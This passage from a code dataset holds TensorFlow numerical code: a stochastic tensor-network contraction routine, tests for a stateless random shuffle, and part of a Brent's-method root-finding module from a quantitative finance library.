return parallel_edges, parallel_dim
def contract_trace_edges(net: network.TensorNetwork, none_value: int = 1
) -> Tuple[network.TensorNetwork,
Dict[network_components.Node, int],
Dict[network_components.Node, int]]:
"""Contracts trace edges and calculate tensor sizes for every node.
Tensor size is defined as the product of sizes of each of edges (axes).
Args:
net: TensorNetwork to contract all the trace edges of.
none_value: The value that None dimensions contribute to the tensor size.
Unit (default) means that None dimensions are neglected.
Returns:
net: Given TensorNetwork with all its trace edges contracted.
node_sizes: Map from nodes in the network to their total size.
node_sizes_none: Map from nodes that have at least one None dimension to
their size.
"""
# Keep node sizes in memory for cost calculation
node_sizes, node_sizes_none = dict(), dict()
initial_node_set = set(net.nodes_set)
for node in initial_node_set:
trace_edges, flag_none, total_dim = set(), False, 1
new_node = node
for edge, dim in zip(node.edges, list(node.get_tensor().shape)):
if edge.node1 is edge.node2:
if edge not in trace_edges:
# Contract trace edge
new_node = net.contract(edge)
trace_edges.add(edge)
else:
if dim is None:
total_dim *= none_value
flag_none = True
else:
total_dim *= dim
if flag_none:
node_sizes_none[new_node] = total_dim
else:
node_sizes[new_node] = total_dim
return net, node_sizes, node_sizes_none
def stochastic(net: network.TensorNetwork,
max_rejections: int, threshold: Optional[int] = None,
none_value: int = 1) -> network.TensorNetwork:
"""Contracts a connected network by stochastically picking edges.
Algorithm 2 in page 7 of https://doi.org/10.1371/journal.pone.0208510.
Cost calculation is slightly modified here:
If A and B are the tensors that share the given `edge`, cost is defined as:
cost = dims(A * B) - max(dims(A), dims(B)), where
* denotes contraction of all shared edges (`contract_parallel`) and
dims(X) is the total dimension of tensor X (product of sizes of all axes).
Args:
net: Connected TensorNetwork to contract fully.
max_rejections: Maximum number of rejections before you increase threshold.
threshold: Initial value for the threshold.
none_value: The value of None dimensions in the cost calculation.
Returns:
net: TensorNetwork with a single node after fully contracting.
"""
net, node_sizes, node_sizes_none = contract_trace_edges(net, none_value)
if threshold is None:
# Set threshold as the maximum tensor size in the network
# ignoring nodes with None sizes.
threshold = max(node_sizes.values())
node_sizes.update(node_sizes_none)
rejections = 0
nondangling_edges = net.get_all_nondangling()
while nondangling_edges:
edge = random.choice(tuple(nondangling_edges))
shared_edges, shared_dim = find_parallel(edge)
new_dim = ((node_sizes[edge.node1] // shared_dim) *
(node_sizes[edge.node2] // shared_dim))
cost = new_dim - max(node_sizes[edge.node1], node_sizes[edge.node2])
if cost <= threshold:
node_sizes.pop(edge.node1)
node_sizes.pop(edge.node2)
node_sizes[net.contract_parallel(edge)] = new_dim
nondangling_edges -= shared_edges
rejections = 0
else:
rejections += 1
if rejections > max_rejections:
threshold *= 2
rejections = 0
return net
``` |
{
"source": "0xflotus/tf-quant-finance",
"score": 2
} |
#### File: math/random/stateless_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tf_quant_finance.math.random import stateless
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
class StatelessRandomOpsTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
def testOutputIsPermutation(self):
"""Checks that stateless_random_shuffle outputs a permutation."""
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
identity_permutation = tf.range(10, dtype=dtype)
random_shuffle_seed_1 = stateless.stateless_random_shuffle(
identity_permutation, seed=tf.constant((1, 42), tf.int64))
random_shuffle_seed_2 = stateless.stateless_random_shuffle(
identity_permutation, seed=tf.constant((2, 42), tf.int64))
# Check that the shuffles are of the correct dtype
for shuffle in (random_shuffle_seed_1, random_shuffle_seed_2):
np.testing.assert_equal(shuffle.dtype, dtype.as_numpy_dtype)
random_shuffle_seed_1 = self.evaluate(random_shuffle_seed_1)
random_shuffle_seed_2 = self.evaluate(random_shuffle_seed_2)
identity_permutation = self.evaluate(identity_permutation)
# Check that the shuffles are different
self.assertTrue(
np.abs(random_shuffle_seed_1 - random_shuffle_seed_2).max())
# Check that the shuffles are indeed permutations
for shuffle in (random_shuffle_seed_1, random_shuffle_seed_2):
self.assertAllEqual(set(shuffle), set(identity_permutation))
@test_util.run_in_graph_and_eager_modes
def testOutputIsStateless(self):
"""Checks that stateless_random_shuffle is stateless."""
random_permutation_next_call = None
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
random_permutation = stateless.stateless_random_shuffle(
tf.range(10, dtype=dtype), seed=(100, 42))
random_permutation_first_call = self.evaluate(random_permutation)
if random_permutation_next_call is not None:
# Checks that the values are the same across different dtypes
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
random_permutation_next_call = self.evaluate(random_permutation)
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
@test_util.run_in_graph_and_eager_modes
def testOutputIsIndependentOfInputValues(self):
"""stateless_random_shuffle output is independent of input_tensor values."""
# Generate sorted array of random numbers to control that the result
# is independent of `input_tesnor` values
np.random.seed(25)
random_input = np.random.normal(size=[10])
random_input.sort()
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
# Permutation of a sequence [0, 1, .., 9]
random_permutation = stateless.stateless_random_shuffle(
tf.range(10, dtype=dtype), seed=(100, 42))
random_permutation = self.evaluate(random_permutation)
# Shuffle `random_input` with the same seed
random_shuffle_control = stateless.stateless_random_shuffle(
random_input, seed=(100, 42))
random_shuffle_control = self.evaluate(random_shuffle_control)
# Checks that the generated permutation does not depend on the underlying
# values
np.testing.assert_array_equal(
np.argsort(random_permutation), np.argsort(random_shuffle_control))
@test_util.run_v1_only("Sessions are not available in TF2.0")
def testOutputIsStatelessSession(self):
"""Checks that stateless_random_shuffle is stateless across Sessions."""
random_permutation_next_call = None
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
random_permutation = stateless.stateless_random_shuffle(
tf.range(10, dtype=dtype), seed=tf.constant((100, 42), tf.int64))
with tf.Session() as sess:
random_permutation_first_call = sess.run(random_permutation)
if random_permutation_next_call is not None:
# Checks that the values are the same across different dtypes
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
with tf.Session() as sess:
random_permutation_next_call = sess.run(random_permutation)
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
@test_util.run_in_graph_and_eager_modes
def testMultiDimensionalShape(self):
"""Check that stateless_random_shuffle works with multi-dim shapes."""
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
input_permutation = tf.constant([[[1], [2], [3]], [[4], [5], [6]]],
dtype=dtype)
random_shuffle = stateless.stateless_random_shuffle(
input_permutation, seed=(1, 42))
random_permutation_first_call = self.evaluate(random_shuffle)
random_permutation_next_call = self.evaluate(random_shuffle)
input_permutation = self.evaluate(input_permutation)
# Check that the dtype is correct
np.testing.assert_equal(random_permutation_first_call.dtype,
dtype.as_numpy_dtype)
# Check that the shuffles are the same
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
# Check that the output shape is correct
np.testing.assert_equal(random_permutation_first_call.shape,
input_permutation.shape)
if __name__ == "__main__":
tf.test.main()
```
#### File: tf_quant_finance/math/root_search.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
BrentResults = collections.namedtuple(
"BrentResults",
[
# A tensor containing the best estimate. If the search was successful,
# this estimate is a root of the objective function.
"estimated_root",
# A tensor containing the value of the objective function at the best
# estimate. If the search was successful, then this is close to 0.
"objective_at_estimated_root",
# A tensor containing number of iterations performed for each pair of
# starting points.
"num_iterations",
# Scalar boolean tensor indicating whether the best estimate is a root
# within the tolerance specified for the search.
"converged",
])
# Values which remain fixed across all root searches (except for tensor dtypes
# and shapes).
_BrentSearchConstants = collections.namedtuple("_BrentSearchConstants", [
"false",
"zero",
"zero_value",
])
# Values which are updated during the root search.
_BrentSearchState = collections.namedtuple("_BrentSearchState", [
"best_estimate",
"value_at_best_estimate",
"last_estimate",
"value_at_last_estimate",
"contrapoint",
"value_at_contrapoint",
"step_to_best_estimate",
"step_to_last_estimate",
"num_iterations",
"finished",
])
# Values which remain fixed for a given root search.
_BrentSearchParams = collections.namedtuple("_BrentSearchParams", [
"objective_fn",
"max_iterations",
"absolute_root_tolerance",
"relative_root_tolerance",
"function_tolerance",
"stopping_policy_fn",
])
def _swap_where(condition, x, y):
"""Swaps the elements of `x` and `y` based on `condition`.
Args:
condition: A `Tensor` of dtype bool.
x: A `Tensor` with the same shape as `condition`.
y: A `Tensor` with the same shape and dtype as `x`.
Returns:
Two `Tensors` with the same shape as `x` and `y`.
"""
return tf.where(condition, y, x), tf.where(condition, x, y)
def _secant_step(x1, x2, y1, y2):
"""Returns the step size at the current position if using the secant method.
This function is meant for exclusive use by the `_brent_loop_body` function:
- It does not guard against divisions by zero, and instead assumes that `y1`
is distinct from `y2`. The `_brent_loop_body` function guarantees this
property.
- It does not guard against overflows which may occur if the difference
between `y1` and `y2` is small while that between `x1` and `x2` is not.
In this case, the resulting step size will be larger than `bisection_step`
and thus ignored by the `_brent_loop_body` function.
Args:
x1: `Tensor` containing the current position.
x2: `Tensor` containing the previous position.
y1: `Tensor` containing the value of `objective_fn` at `x1`.
y2: `Tensor` containing the value of `objective_fn` at `x2`.
Returns:
A `Tensor` with the same shape and dtype as `current`.
"""
x_difference = x1 - x2
y_difference = y1 - y2
return -y1 * x_difference / y_difference
def _quadratic_interpolation_step(x1, x2, x3, y1, y2, y3):
"""Returns the step size to use when using quadratic interpolation.
This function is meant for exclusive use by the `_brent_loop_body` function.
It does not guard against divisions by zero, and instead assumes that `y1` is
distinct from `y2` and `y3`. The `_brent_loop_body` function guarantees this
property.
Args:
x1: `Tensor` of any shape and real dtype containing the first position used
for extrapolation.
x2: `Tensor` of the same shape and dtype as `x1` containing the second
position used for extrapolation.
x3: `Tensor` of the same shape and dtype as `x1` containing the third
position used for extrapolation.
y1: `Tensor` containing the value of the interpolated function at `x1`.
y2: `Tensor` containing the value of interpolated function at `x2`.
y3: `Tensor` containing the value of interpolated function at `x3`.
Returns:
A `Tensor` with the same shape and dtype as `x1`.
"""
r2 = (x2 - x1) / (y2 - y1)
r3 = (x3 - x1) / (y3 - y1)
return -x1 * (x3 * r3 - x2 * r2) / (r3 * r2 * (x3 - x2))
def default_relative_root_tolerance(dtype):
"""Returns the default relative root tolerance used for a TensorFlow dtype."""
return 4 * np.finfo(dtype.as_numpy_dtype()).eps
def _should_stop(state, stopping_policy_fn):
"""Indicates whether the overall Brent search should continue.
Args:
state: A Python `_BrentSearchState` namedtuple.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
Returns:
A boolean value indicating whether the overall search should continue.
"""
return tf.convert_to_tensor(
stopping_policy_fn(state.finished), name="should_stop", dtype=tf.bool)
# This is a direct translation of the Brent root-finding method.
# Each operation is guarded by a call to `tf.where` to avoid performing
# unnecessary calculations.
def _brent_loop_body(state, params, constants):
"""Performs one iteration of the Brent root-finding algorithm.
Args:
state: A Python `_BrentSearchState` namedtuple.
params: A Python `_BrentSearchParams` namedtuple.
constants: A Python `_BrentSearchConstants` namedtuple.
Returns:
The `Tensor`s to use for the next iteration of the algorithm.
"""
best_estimate = state.best_estimate
last_estimate = state.last_estimate
contrapoint = state.contrapoint
value_at_best_estimate = state.value_at_best_estimate
value_at_last_estimate = state.value_at_last_estimate
value_at_contrapoint = state.value_at_contrapoint
step_to_best_estimate = state.step_to_best_estimate
step_to_last_estimate = state.step_to_last_estimate
num_iterations = state.num_iterations
finished = state.finished
# If the root is between the last two estimates, use the worst of the two
# as new contrapoint. Adjust step sizes accordingly.
replace_contrapoint = ~finished & (
value_at_last_estimate * value_at_best_estimate < constants.zero_value)
contrapoint = tf.where(replace_contrapoint, last_estimate, contrapoint)
value_at_contrapoint = tf.where(replace_contrapoint, value_at_last_estimate,
value_at_contrapoint)
step_to_last_estimate = tf.where(replace_contrapoint,
best_estimate - last_estimate,
step_to_last_estimate)
step_to_best_estimate = tf.where(replace_contrapoint, step_to_last_estimate,
step_to_best_estimate)
# If the contrapoint is a better guess than the current root estimate, swap
# them. Also, replace the worst of the two with the current contrapoint.
replace_best_estimate = tf.where(
finished, constants.false,
tf.math.abs(value_at_contrapoint) < tf.math.abs(value_at_best_estimate))
last_estimate = tf.where(replace_best_estimate, best_estimate, last_estimate)
best_estimate = tf.where(replace_best_estimate, contrapoint, best_estimate)
contrapoint = tf.where(replace_best_estimate, last_estimate, contrapoint)
value_at_last_estimate = tf.where(replace_best_estimate,
value_at_best_estimate,
value_at_last_estimate)
value_at_best_estimate = tf.where(replace_best_estimate, value_at_contrapoint,
value_at_best_estimate)
value_at_contrapoint = tf.where(replace_best_estimate, value_at_last_estimate,
value_at_contrapoint)
# Compute the tolerance used to control root search at the current position
# and the step size corresponding to the bisection method.
root_tolerance = 0.5 * (
params.absolute_root_tolerance +
params.relative_root_tolerance * tf.math.abs(best_estimate))
bisection_step = 0.5 * (contrapoint - best_estimate)
# Mark the search as finished if either:
# 1. the maximum number of iterations has been reached;
# 2. the desired tolerance has been reached (even if no root was found);
# 3. the current root estimate is good enough.
# Using zero as `function_tolerance` will check for exact roots and match
# both Brent's original algorithm and the SciPy implementation.
finished |= (num_iterations >= params.max_iterations) | (
tf.math.abs(bisection_step) <
root_tolerance) | (~tf.math.is_finite(value_at_best_estimate)) | (
tf.math.abs(value_at_best_estimate) <= params.function_tolerance)
# Determine whether interpolation or extrapolation are worth performing at
# the current position.
compute_short_step = tf.where(
finished, constants.false,
(root_tolerance < tf.math.abs(step_to_last_estimate)) &
(tf.math.abs(value_at_best_estimate) <
tf.math.abs(value_at_last_estimate)))
short_step = tf.where(
compute_short_step,
tf.where(
# The contrapoint cannot be equal to the current root estimate since
# they have opposite signs. However, it may be equal to the previous
# estimate.
tf.equal(last_estimate, contrapoint),
# If so, use the secant method to avoid a division by zero which
# would occur if using extrapolation.
_secant_step(best_estimate, last_estimate, value_at_best_estimate,
value_at_last_estimate),
# Pass values of the objective function as x values, and root
# estimates as y values in order to perform *inverse* extrapolation.
_quadratic_interpolation_step(value_at_best_estimate,
value_at_last_estimate,
value_at_contrapoint, best_estimate,
last_estimate, contrapoint)),
# Default to zero if using bisection.
constants.zero)
# Use the step calculated above if both:
# 1. step size < |previous step size|
# 2. step size < 3/4 * |contrapoint - current root estimate|
# Ensure that `short_step` was calculated by guarding the calculation with
# `compute_short_step`.
use_short_step = tf.where(
compute_short_step, 2 * tf.math.abs(short_step) < tf.minimum(
3 * tf.math.abs(bisection_step) - root_tolerance,
tf.math.abs(step_to_last_estimate)), constants.false)
# Revert to bisection when not using `short_step`.
step_to_last_estimate = tf.where(use_short_step, step_to_best_estimate,
bisection_step)
step_to_best_estimate = tf.where(
finished, constants.zero,
tf.where(use_short_step, short_step, bisection_step))
# Update the previous and current root estimates.
last_estimate = tf.where(finished, last_estimate, best_estimate)
best_estimate += tf.where(
finished, constants.zero,
tf.where(root_tolerance < tf.math.abs(step_to_best_estimate),
step_to_best_estimate,
tf.where(bisection_step > 0, root_tolerance, -root_tolerance)))
value_at_last_estimate = tf.where(finished, value_at_last_estimate,
value_at_best_estimate)
value_at_best_estimate = tf.where(finished, value_at_best_estimate,
params.objective_fn(best_estimate))
num_iterations = tf.where(finished, num_iterations, num_iterations + 1)
return [
_BrentSearchState(
best_estimate=best_estimate,
last_estimate=last_estimate,
contrapoint=contrapoint,
value_at_best_estimate=value_at_best_estimate,
value_at_last_estimate=value_at_last_estimate,
value_at_contrapoint=value_at_contrapoint,
step_to_best_estimate=step_to_best_estimate,
step_to_last_estimate=step_to_last_estimate,
num_iterations=num_iterations,
finished=finished)
]
def _prepare_brent_args(objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket,
value_at_right_bracket,
absolute_root_tolerance=2e-7,
relative_root_tolerance=None,
function_tolerance=2e-7,
max_iterations=100,
stopping_policy_fn=None):
r"""Prepares arguments for root search using Brent's method.
Args:
objective_fn: Python callable for which roots are searched. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as `left_bracket`.
left_bracket: `Tensor` or Python float representing the first starting
points. The function will search for roots between each pair of points
defined by `left_bracket` and `right_bracket`. The shape of `left_bracket`
should match that of the input to `objective_fn`.
right_bracket: `Tensor` of the same shape and dtype as `left_bracket` or
Python float representing the second starting points. The function will
search for roots between each pair of points defined by `left_bracket` and
`right_bracket`. This argument must have the same shape as `left_bracket`.
value_at_left_bracket: Optional `Tensor` or Pyhon float representing the
value of `objective_fn` at `left_bracket`. If specified, this argument
must have the same shape as `left_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
value_at_right_bracket: Optional `Tensor` or Pyhon float representing the
value of `objective_fn` at `right_bracket`. If specified, this argument
must have the same shape as `right_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
absolute_root_tolerance: Optional `Tensor` representing the absolute
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `2e-7`.
relative_root_tolerance: Optional `Tensor` representing the relative
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `None` which translates to `4 *
numpy.finfo(left_bracket.dtype.as_numpy_dtype).eps`.
function_tolerance: Optional `Tensor` representing the tolerance used to
check for roots. If the absolute value of `objective_fn` is smaller than
or equal to `function_tolerance` at a given estimate, then that estimate
is considered a root for the function. If specified, this argument must
broadcast with the shape of `left_bracket` and have the same dtype. Set to
zero to match Brent's original algorithm and to continue the search until
an exact root is found.
Default value: `2e-7`.
max_iterations: Optional `Tensor` of an integral dtype or Python integer
specifying the maximum number of steps to perform for each initial point.
Must broadcast with the shape of `left_bracket`. If an element is set to
zero, the function will not search for any root for the corresponding
points in `left_bracket` and `right_bracket`. Instead, it will return the
best estimate from the inputs.
Default value: `100`.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
It must be a callable accepting a `Tensor` of booleans with the shape of
`left_bracket` (each denoting whether the search is finished for each
starting point), and returning a scalar boolean `Tensor` (indicating
whether the overall search should stop). Typical values are
`tf.reduce_all` (which returns only when the search is finished for all
pairs of points), and `tf.reduce_any` (which returns as soon as the search
is finished for any pair of points).
Default value: `None` which translates to `tf.reduce_all`.
Returns:
A tuple of 3 Python objects containing the state, parameters, and constants
to use for the search.
"""
stopping_policy_fn = stopping_policy_fn or tf.reduce_all
if not callable(stopping_policy_fn):
raise ValueError("stopping_policy_fn must be callable")
left_bracket = tf.convert_to_tensor(left_bracket, name="left_bracket")
right_bracket = tf.convert_to_tensor(
right_bracket, name="right_bracket", dtype=left_bracket.dtype)
if value_at_left_bracket is None:
value_at_left_bracket = objective_fn(left_bracket)
if value_at_right_bracket is None:
value_at_right_bracket = objective_fn(right_bracket)
value_at_left_bracket = tf.convert_to_tensor(
value_at_left_bracket,
name="value_at_left_bracket",
dtype=left_bracket.dtype.base_dtype)
value_at_right_bracket = tf.convert_to_tensor(
value_at_right_bracket,
name="value_at_right_bracket",
dtype=left_bracket.dtype.base_dtype)
if relative_root_tolerance is None:
relative_root_tolerance = default_relative_root_tolerance(
left_bracket.dtype.base_dtype)
absolute_root_tolerance = tf.convert_to_tensor(
absolute_root_tolerance,
name="absolute_root_tolerance",
dtype=left_bracket.dtype)
relative_root_tolerance = tf.convert_to_tensor(
relative_root_tolerance,
name="relative_root_tolerance",
dtype=left_bracket.dtype)
function_tolerance = tf.convert_to_tensor(
function_tolerance, name="function_tolerance", dtype=left_bracket.dtype)
max_iterations = tf.broadcast_to(
tf.convert_to_tensor(max_iterations),
name="max_iterations",
shape=left_bracket.shape)
num_iterations = tf.zeros_like(max_iterations)
false = tf.constant(False, shape=left_bracket.shape)
zero = tf.zeros_like(left_bracket)
contrapoint = zero
step_to_last_estimate = zero
step_to_best_estimate = zero
zero_value = tf.zeros_like(value_at_left_bracket)
value_at_contrapoint = zero_value
# Select the best root estimates from the inputs.
# If no search is performed (e.g. `max_iterations` is `zero`), the estimate
# computed this way will be returned. This differs slightly from the SciPy
# implementation which always returns the `right_bracket`.
swap_positions = tf.math.abs(value_at_left_bracket) < tf.math.abs(
value_at_right_bracket)
best_estimate, last_estimate = _swap_where(swap_positions, right_bracket,
left_bracket)
value_at_best_estimate, value_at_last_estimate = _swap_where(
swap_positions, value_at_right_bracket, value_at_left_bracket)
# Check if the current root estimate is good enough.
# Using zero as `function_tolerance` will check for exact roots and match both
# Brent's original algorithm and the SciPy implementation.
finished = (num_iterations >=
max_iterations) | (~tf.math.is_finite(value_at_last_estimate)) | (
~tf.math.is_finite(value_at_best_estimate)) | (
tf.math.abs(value_at_best_estimate) <= function_tolerance)
return (_BrentSearchState(
best_estimate=best_estimate,
last_estimate=last_estimate,
contrapoint=contrapoint,
value_at_best_estimate=value_at_best_estimate,
value_at_last_estimate=value_at_last_estimate,
value_at_contrapoint=value_at_contrapoint,
step_to_best_estimate=step_to_best_estimate,
step_to_last_estimate=step_to_last_estimate,
num_iterations=num_iterations,
finished=finished),
_BrentSearchParams(
objective_fn=objective_fn,
max_iterations=max_iterations,
absolute_root_tolerance=absolute_root_tolerance,
relative_root_tolerance=relative_root_tolerance,
function_tolerance=function_tolerance,
stopping_policy_fn=stopping_policy_fn),
_BrentSearchConstants(false=false, zero=zero, zero_value=zero_value))
# `_brent` currently only support inverse quadratic extrapolation.
# This will be fixed when adding the `brenth` variant.
def _brent(objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket=None,
value_at_right_bracket=None,
absolute_root_tolerance=2e-7,
relative_root_tolerance=None,
function_tolerance=2e-7,
max_iterations=100,
stopping_policy_fn=None,
validate_args=False,
name=None):
r"""Finds root(s) of a function of a single variable using Brent's method.
[Brent's method](https://en.wikipedia.org/wiki/Brent%27s_method) is a
root-finding algorithm combining the bisection method, the secant method and
extrapolation. Like bisection it is guaranteed to converge towards a root if
one exists, but that convergence is superlinear and on par with less reliable
methods.
This implementation is a translation of the algorithm described in the
[original article](https://academic.oup.com/comjnl/article/14/4/422/325237).
Args:
objective_fn: Python callable for which roots are searched. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as `left_bracket`.
left_bracket: `Tensor` or Python float representing the first starting
points. The function will search for roots between each pair of points
defined by `left_bracket` and `right_bracket`. The shape of `left_bracket`
should match that of the input to `objective_fn`.
right_bracket: `Tensor` of the same shape and dtype as `left_bracket` or
Python float representing the second starting points. The function will
search for roots between each pair of points defined by `left_bracket` and
`right_bracket`. This argument must have the same shape as `left_bracket`.
value_at_left_bracket: Optional `Tensor` or Pyhon float representing the
value of `objective_fn` at `left_bracket`. If specified, this argument
must have the same shape as `left_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
value_at_right_bracket: Optional `Tensor` or Pyhon float representing the
value of `objective_fn` at `right_bracket`. If specified, this argument
must have the same shape as `right_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
absolute_root_tolerance: Optional `Tensor` representing the absolute
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `2e-7`.
relative_root_tolerance: Optional `Tensor` representing the relative
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `None` which translates to `4 *
numpy.finfo(left_bracket.dtype.as_numpy_dtype).eps`.
function_tolerance: Optional `Tensor` representing the tolerance used to
check for roots. If the absolute value of `objective_fn` is smaller than
or equal to `function_tolerance` at a given estimate, then that estimate
is considered a root for the function. If specified, this argument must
broadcast with the shape of `left_bracket` and have the same dtype. Set to
zero to match Brent's original algorithm and to continue the search until
an exact root is found.
Default value: `2e-7`.
max_iterations: Optional `Tensor` of an integral dtype or Python integer
specifying the maximum number of steps to perform for each initial point.
Must broadcast with the shape of `left_bracket`. If an element is set to
zero, the function will not search for any root for the corresponding
points in `left_bracket` and `right_bracket`. Instead, it will return the
best estimate from the inputs.
Default value: `100`.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
It must be a callable accepting a `Tensor` of booleans with the shape of
`left_bracket` (each denoting whether the search is finished for each
starting point), and returning a scalar boolean `Tensor` (indicating
whether the overall search should stop). Typical values are
`tf.reduce_all` (which returns only when the search is finished for all
pairs of points), and `tf.reduce_any` (which returns as soon as the search
is finished for any pair of points).
Default value: `None` which translates to `tf.reduce_all`.
validate_args: Python `bool` indicating whether to validate arguments such
as `left_bracket`, `right_bracket`, `absolute_root_tolerance`,
`relative_root_tolerance`, `function_tolerance`, and `max_iterations`.
Default value: `False`.
name: Python `str` name prefixed to ops created by this function.
Returns:
brent_results: A Python object containing the following attributes:
estimated_root: `Tensor` containing the best estimate explored. If the
search was successful within the specified tolerance, this estimate is
a root of the objective function.
objective_at_estimated_root: `Tensor` containing the value of the
objective function at `estimated_root`. If the search was successful
within the specified tolerance, then this is close to 0. It has the
same dtype and shape as `estimated_root`.
num_iterations: `Tensor` containing the number of iterations performed.
It has the same dtype as `max_iterations` and shape as `estimated_root`.
converged: Scalar boolean `Tensor` indicating whether `estimated_root` is
a root within the tolerance specified for the search. It has the same
shape as `estimated_root`.
Raises:
ValueError: if the `stopping_policy_fn` is not callable.
"""
with tf.name_scope(name, "brent_root", [
left_bracket, right_bracket, value_at_left_bracket,
value_at_right_bracket, max_iterations
]):
state, params, constants = _prepare_brent_args(
objective_fn, left_bracket, right_bracket, value_at_left_bracket,
value_at_right_bracket, absolute_root_tolerance,
relative_root_tolerance, function_tolerance, max_iterations,
stopping_policy_fn)
assertions = []
if validate_args:
assertions += [
tf.Assert(
tf.reduce_all(
state.value_at_last_estimate *
state.value_at_best_estimate <= constants.zero_value),
[state.value_at_last_estimate, state.value_at_best_estimate]),
tf.Assert(
tf.reduce_all(params.absolute_root_tolerance > constants.zero),
[params.absolute_root_tolerance]),
tf.Assert(
tf.reduce_all(params.relative_root_tolerance > constants.zero),
[params.relative_root_tolerance]),
tf.Assert(
tf.reduce_all(params.function_tolerance >= constants.zero),
[params.function_tolerance]),
tf.Assert(
tf.reduce_all(params.max_iterations >= state.num_iterations),
[params.max_iterations]),
]
with tf.control_dependencies(assertions):
result = tf.while_loop(
# Negate `_should_stop` to determine if the search should continue.
# This means, in particular, that tf.reduce_*all* will return only
# when the search is finished for *all* starting points.
lambda loop_vars: ~_should_stop(loop_vars, params.stopping_policy_fn),
lambda state: _brent_loop_body(state, params, constants),
loop_vars=[state])
state = result[0]
converged = tf.math.abs(state.value_at_best_estimate) <= function_tolerance
return BrentResults(
estimated_root=state.best_estimate,
objective_at_estimated_root=state.value_at_best_estimate,
num_iterations=state.num_iterations,
converged=converged)
def brentq(objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket=None,
value_at_right_bracket=None,
absolute_root_tolerance=2e-7,
relative_root_tolerance=None,
function_tolerance=2e-7,
max_iterations=100,
stopping_policy_fn=None,
validate_args=False,
name=None):
r"""Finds root(s) of a function of single variable using Brent's method.
[Brent's method](https://en.wikipedia.org/wiki/Brent%27s_method) is a
root-finding algorithm combining the bisection method, the secant method and
extrapolation. Like bisection it is guaranteed to converge towards a root if
one exists, but that convergence is superlinear and on par with less reliable
methods.
This implementation is a translation of the algorithm described in the
[original article](https://academic.oup.com/comjnl/article/14/4/422/325237).
Args:
objective_fn: Python callable for which roots are searched. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as `left_bracket`.
left_bracket: `Tensor` or Python float representing the first starting
points. The function will search for roots between each pair of points
defined by `left_bracket` and `right_bracket`. The shape of `left_bracket`
should match that of the input to `objective_fn`.
right_bracket: `Tensor` of the same shape and dtype as `left_bracket` or
Python float representing the second starting points. The function will
search for roots between each pair of points defined by `left_bracket` and
`right_bracket`. This argument must have the same shape as `left_bracket`.
value_at_left_bracket: Optional `Tensor` or Pyhon float representing the
value of `objective_fn` at `left_bracket`. If specified, this argument
must have the same shape as `left_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
value_at_right_bracket: Optional `Tensor` or Pyhon float representing the
value of `objective_fn` at `right_bracket`. If specified, this argument
must have the same shape as `right_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
absolute_root_tolerance: Optional `Tensor` representing the absolute
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `2e-7`.
relative_root_tolerance: Optional `Tensor` representing the relative
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `None` which translates to `4 *
numpy.finfo(left_bracket.dtype.as_numpy_dtype).eps`.
function_tolerance: Optional `Tensor` representing the tolerance used to
check for roots. If the absolute value of `objective_fn` is smaller than
or equal to `function_tolerance` at a given estimate, then that estimate
is considered a root for the function. If specified, this argument must
broadcast with the shape of `left_bracket` and have the same dtype. Set to
zero to match Brent's original algorithm and to continue the search until
an exact root is found.
Default value: `2e-7`.
max_iterations: Optional `Tensor` of an integral dtype or Python integer
specifying the maximum number of steps to perform for each initial point.
Must broadcast with the shape of `left_bracket`. If an element is set to
zero, the function will not search for any root for the corresponding
points in `left_bracket` and `right_bracket`. Instead, it will return the
best estimate from the inputs.
Default value: `100`.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
It must be a callable accepting a `Tensor` of booleans with the shape of
`left_bracket` (each denoting whether the search is finished for each
starting point), and returning a scalar boolean `Tensor` (indicating
whether the overall search should stop). Typical values are
